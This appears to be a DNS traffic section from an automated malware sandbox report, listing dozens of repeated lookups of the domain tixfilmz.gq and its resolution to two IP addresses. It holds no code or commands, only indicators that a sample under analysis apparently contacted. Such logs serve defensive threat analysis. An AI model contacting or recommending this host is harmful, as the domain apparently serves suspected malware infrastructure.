Aug 11, 2022 06:42:26.266694069 CEST	192.168.2.3	8.8.8.8	0xc3c2	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:27.336091995 CEST	192.168.2.3	8.8.8.8	0x1824	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:28.398569107 CEST	192.168.2.3	8.8.8.8	0xff45	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:29.567910910 CEST	192.168.2.3	8.8.8.8	0x376a	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:30.599355936 CEST	192.168.2.3	8.8.8.8	0xba56	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:31.643933058 CEST	192.168.2.3	8.8.8.8	0x4bae	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:32.866031885 CEST	192.168.2.3	8.8.8.8	0x9d08	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:33.939414978 CEST	192.168.2.3	8.8.8.8	0x84f1	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:35.888000011 CEST	192.168.2.3	8.8.8.8	0x3da	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:39.275734901 CEST	192.168.2.3	8.8.8.8	0xb3fa	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:41.147021055 CEST	192.168.2.3	8.8.8.8	0xbca9	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:42.621895075 CEST	192.168.2.3	8.8.8.8	0x1213	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:44.058989048 CEST	192.168.2.3	8.8.8.8	0x2ec5	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:45.236285925 CEST	192.168.2.3	8.8.8.8	0x10f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:46.902745962 CEST	192.168.2.3	8.8.8.8	0x79b	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:49.092282057 CEST	192.168.2.3	8.8.8.8	0x878f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:50.516971111 CEST	192.168.2.3	8.8.8.8	0xd021	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:51.834033012 CEST	192.168.2.3	8.8.8.8	0x6bc7	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:53.157044888 CEST	192.168.2.3	8.8.8.8	0x5202	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:54.271861076 CEST	192.168.2.3	8.8.8.8	0x3c6f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:55.372447968 CEST	192.168.2.3	8.8.8.8	0x7cfa	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:56.596381903 CEST	192.168.2.3	8.8.8.8	0xae31	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:58.058382034 CEST	192.168.2.3	8.8.8.8	0x513f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:59.355876923 CEST	192.168.2.3	8.8.8.8	0x7f96	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:00.603039026 CEST	192.168.2.3	8.8.8.8	0x2bdc	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:01.898330927 CEST	192.168.2.3	8.8.8.8	0x795d	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:02.955979109 CEST	192.168.2.3	8.8.8.8	0x9145	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:04.122617960 CEST	192.168.2.3	8.8.8.8	0x60e6	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:05.296510935 CEST	192.168.2.3	8.8.8.8	0x1fbc	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:06.496205091 CEST	192.168.2.3	8.8.8.8	0x90b2	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:07.973258018 CEST	192.168.2.3	8.8.8.8	0x60db	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:09.210062981 CEST	192.168.2.3	8.8.8.8	0x11c9	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:10.585853100 CEST	192.168.2.3	8.8.8.8	0x519a	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:11.857250929 CEST	192.168.2.3	8.8.8.8	0x3542	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:13.118525028 CEST	192.168.2.3	8.8.8.8	0x4292	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:14.460020065 CEST	192.168.2.3	8.8.8.8	0x5a5f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:16.765618086 CEST	192.168.2.3	8.8.8.8	0xb95c	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:19.702389002 CEST	192.168.2.3	8.8.8.8	0x6e31	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:24.353002071 CEST	192.168.2.3	8.8.8.8	0xcf88	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:28.465460062 CEST	192.168.2.3	8.8.8.8	0xd243	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:31.883057117 CEST	192.168.2.3	8.8.8.8	0x829c	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:33.838053942 CEST	192.168.2.3	8.8.8.8	0xb177	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:38.314882994 CEST	192.168.2.3	8.8.8.8	0x4896	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:40.517680883 CEST	192.168.2.3	8.8.8.8	0x86cb	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:42.718416929 CEST	192.168.2.3	8.8.8.8	0xdbfe	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:45.776087999 CEST	192.168.2.3	8.8.8.8	0xe80	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:47.294298887 CEST	192.168.2.3	8.8.8.8	0xc54d	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:48.364883900 CEST	192.168.2.3	8.8.8.8	0x4ed0	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:49.974272013 CEST	192.168.2.3	8.8.8.8	0x67d6	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:51.595494986 CEST	192.168.2.3	8.8.8.8	0x376f	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:53.263878107 CEST	192.168.2.3	8.8.8.8	0xe2e0	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:54.290009975 CEST	192.168.2.3	8.8.8.8	0x102b	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:55.334676981 CEST	192.168.2.3	8.8.8.8	0x84b8	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:58.292326927 CEST	192.168.2.3	8.8.8.8	0x312e	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:00.089895010 CEST	192.168.2.3	8.8.8.8	0x8ca9	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:01.716732025 CEST	192.168.2.3	8.8.8.8	0x158e	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:03.415052891 CEST	192.168.2.3	8.8.8.8	0xe735	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:04.875478029 CEST	192.168.2.3	8.8.8.8	0xfad3	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:06.112749100 CEST	192.168.2.3	8.8.8.8	0xe3c7	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:07.745066881 CEST	192.168.2.3	8.8.8.8	0x9e07	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:08.781137943 CEST	192.168.2.3	8.8.8.8	0xc274	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:09.862853050 CEST	192.168.2.3	8.8.8.8	0x366b	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 11, 2022 06:42:12.602015018 CEST	8.8.8.8	192.168.2.3	0x5c29	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:12.602015018 CEST	8.8.8.8	192.168.2.3	0x5c29	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:14.014944077 CEST	8.8.8.8	192.168.2.3	0xbd3d	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:14.014944077 CEST	8.8.8.8	192.168.2.3	0xbd3d	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:15.031099081 CEST	8.8.8.8	192.168.2.3	0x9c66	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:15.031099081 CEST	8.8.8.8	192.168.2.3	0x9c66	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:16.137682915 CEST	8.8.8.8	192.168.2.3	0xb56c	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:16.137682915 CEST	8.8.8.8	192.168.2.3	0xb56c	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:17.425028086 CEST	8.8.8.8	192.168.2.3	0x673c	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:17.425028086 CEST	8.8.8.8	192.168.2.3	0x673c	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:18.516221046 CEST	8.8.8.8	192.168.2.3	0xe48e	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:18.516221046 CEST	8.8.8.8	192.168.2.3	0xe48e	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:19.568968058 CEST	8.8.8.8	192.168.2.3	0x48ed	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:19.568968058 CEST	8.8.8.8	192.168.2.3	0x48ed	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:20.720654964 CEST	8.8.8.8	192.168.2.3	0x281b	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:20.720654964 CEST	8.8.8.8	192.168.2.3	0x281b	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:21.811207056 CEST	8.8.8.8	192.168.2.3	0x5b0e	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:21.811207056 CEST	8.8.8.8	192.168.2.3	0x5b0e	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:22.941586018 CEST	8.8.8.8	192.168.2.3	0x8ef0	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:22.941586018 CEST	8.8.8.8	192.168.2.3	0x8ef0	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:24.015325069 CEST	8.8.8.8	192.168.2.3	0xe554	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:24.015325069 CEST	8.8.8.8	192.168.2.3	0xe554	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:25.185749054 CEST	8.8.8.8	192.168.2.3	0x3ae7	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:25.185749054 CEST	8.8.8.8	192.168.2.3	0x3ae7	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:26.285726070 CEST	8.8.8.8	192.168.2.3	0xc3c2	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:26.285726070 CEST	8.8.8.8	192.168.2.3	0xc3c2	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:27.355494976 CEST	8.8.8.8	192.168.2.3	0x1824	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:27.355494976 CEST	8.8.8.8	192.168.2.3	0x1824	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:28.415982008 CEST	8.8.8.8	192.168.2.3	0xff45	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:28.415982008 CEST	8.8.8.8	192.168.2.3	0xff45	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:29.587415934 CEST	8.8.8.8	192.168.2.3	0x376a	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:29.587415934 CEST	8.8.8.8	192.168.2.3	0x376a	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:30.618824005 CEST	8.8.8.8	192.168.2.3	0xba56	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:30.618824005 CEST	8.8.8.8	192.168.2.3	0xba56	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:31.661487103 CEST	8.8.8.8	192.168.2.3	0x4bae	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:31.661487103 CEST	8.8.8.8	192.168.2.3	0x4bae	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:32.883007050 CEST	8.8.8.8	192.168.2.3	0x9d08	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:32.883007050 CEST	8.8.8.8	192.168.2.3	0x9d08	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:33.958312035 CEST	8.8.8.8	192.168.2.3	0x84f1	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:33.958312035 CEST	8.8.8.8	192.168.2.3	0x84f1	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:35.905409098 CEST	8.8.8.8	192.168.2.3	0x3da	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:35.905409098 CEST	8.8.8.8	192.168.2.3	0x3da	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:39.295176029 CEST	8.8.8.8	192.168.2.3	0xb3fa	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:39.295176029 CEST	8.8.8.8	192.168.2.3	0xb3fa	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:41.166609049 CEST	8.8.8.8	192.168.2.3	0xbca9	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:41.166609049 CEST	8.8.8.8	192.168.2.3	0xbca9	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:42.748029947 CEST	8.8.8.8	192.168.2.3	0x1213	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:42.748029947 CEST	8.8.8.8	192.168.2.3	0x1213	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:44.078478098 CEST	8.8.8.8	192.168.2.3	0x2ec5	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:44.078478098 CEST	8.8.8.8	192.168.2.3	0x2ec5	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:45.256028891 CEST	8.8.8.8	192.168.2.3	0x10f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:45.256028891 CEST	8.8.8.8	192.168.2.3	0x10f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:46.922283888 CEST	8.8.8.8	192.168.2.3	0x79b	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:46.922283888 CEST	8.8.8.8	192.168.2.3	0x79b	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:49.111659050 CEST	8.8.8.8	192.168.2.3	0x878f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:49.111659050 CEST	8.8.8.8	192.168.2.3	0x878f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:50.536231041 CEST	8.8.8.8	192.168.2.3	0xd021	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:50.536231041 CEST	8.8.8.8	192.168.2.3	0xd021	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:51.851875067 CEST	8.8.8.8	192.168.2.3	0x6bc7	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:51.851875067 CEST	8.8.8.8	192.168.2.3	0x6bc7	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:53.176513910 CEST	8.8.8.8	192.168.2.3	0x5202	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:53.176513910 CEST	8.8.8.8	192.168.2.3	0x5202	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:54.291218042 CEST	8.8.8.8	192.168.2.3	0x3c6f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:54.291218042 CEST	8.8.8.8	192.168.2.3	0x3c6f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:55.389997959 CEST	8.8.8.8	192.168.2.3	0x7cfa	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:55.389997959 CEST	8.8.8.8	192.168.2.3	0x7cfa	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:56.616301060 CEST	8.8.8.8	192.168.2.3	0xae31	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:56.616301060 CEST	8.8.8.8	192.168.2.3	0xae31	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:58.078123093 CEST	8.8.8.8	192.168.2.3	0x513f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:58.078123093 CEST	8.8.8.8	192.168.2.3	0x513f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:59.373456955 CEST	8.8.8.8	192.168.2.3	0x7f96	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:59.373456955 CEST	8.8.8.8	192.168.2.3	0x7f96	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:00.622443914 CEST	8.8.8.8	192.168.2.3	0x2bdc	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:00.622443914 CEST	8.8.8.8	192.168.2.3	0x2bdc	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:01.917530060 CEST	8.8.8.8	192.168.2.3	0x795d	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:01.917530060 CEST	8.8.8.8	192.168.2.3	0x795d	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:02.975430965 CEST	8.8.8.8	192.168.2.3	0x9145	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:02.975430965 CEST	8.8.8.8	192.168.2.3	0x9145	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:04.141944885 CEST	8.8.8.8	192.168.2.3	0x60e6	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:04.141944885 CEST	8.8.8.8	192.168.2.3	0x60e6	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:05.314194918 CEST	8.8.8.8	192.168.2.3	0x1fbc	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:05.314194918 CEST	8.8.8.8	192.168.2.3	0x1fbc	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:06.515471935 CEST	8.8.8.8	192.168.2.3	0x90b2	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:06.515471935 CEST	8.8.8.8	192.168.2.3	0x90b2	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:07.990590096 CEST	8.8.8.8	192.168.2.3	0x60db	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:07.990590096 CEST	8.8.8.8	192.168.2.3	0x60db	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:09.229652882 CEST	8.8.8.8	192.168.2.3	0x11c9	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:09.229652882 CEST	8.8.8.8	192.168.2.3	0x11c9	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:10.605609894 CEST	8.8.8.8	192.168.2.3	0x519a	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:10.605609894 CEST	8.8.8.8	192.168.2.3	0x519a	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:11.876543999 CEST	8.8.8.8	192.168.2.3	0x3542	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:11.876543999 CEST	8.8.8.8	192.168.2.3	0x3542	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:13.137489080 CEST	8.8.8.8	192.168.2.3	0x4292	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:13.137489080 CEST	8.8.8.8	192.168.2.3	0x4292	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:14.482197046 CEST	8.8.8.8	192.168.2.3	0x5a5f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:14.482197046 CEST	8.8.8.8	192.168.2.3	0x5a5f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:16.782715082 CEST	8.8.8.8	192.168.2.3	0xb95c	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:16.782715082 CEST	8.8.8.8	192.168.2.3	0xb95c	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:19.721796036 CEST	8.8.8.8	192.168.2.3	0x6e31	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:19.721796036 CEST	8.8.8.8	192.168.2.3	0x6e31	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:24.372870922 CEST	8.8.8.8	192.168.2.3	0xcf88	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:24.372870922 CEST	8.8.8.8	192.168.2.3	0xcf88	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:28.482649088 CEST	8.8.8.8	192.168.2.3	0xd243	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:28.482649088 CEST	8.8.8.8	192.168.2.3	0xd243	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:31.902369022 CEST	8.8.8.8	192.168.2.3	0x829c	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:31.902369022 CEST	8.8.8.8	192.168.2.3	0x829c	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:33.857176065 CEST	8.8.8.8	192.168.2.3	0xb177	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:33.857176065 CEST	8.8.8.8	192.168.2.3	0xb177	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:38.334461927 CEST	8.8.8.8	192.168.2.3	0x4896	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:38.334461927 CEST	8.8.8.8	192.168.2.3	0x4896	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:40.536607981 CEST	8.8.8.8	192.168.2.3	0x86cb	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:40.536607981 CEST	8.8.8.8	192.168.2.3	0x86cb	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:42.738006115 CEST	8.8.8.8	192.168.2.3	0xdbfe	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:42.738006115 CEST	8.8.8.8	192.168.2.3	0xdbfe	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:45.793565989 CEST	8.8.8.8	192.168.2.3	0xe80	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:45.793565989 CEST	8.8.8.8	192.168.2.3	0xe80	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
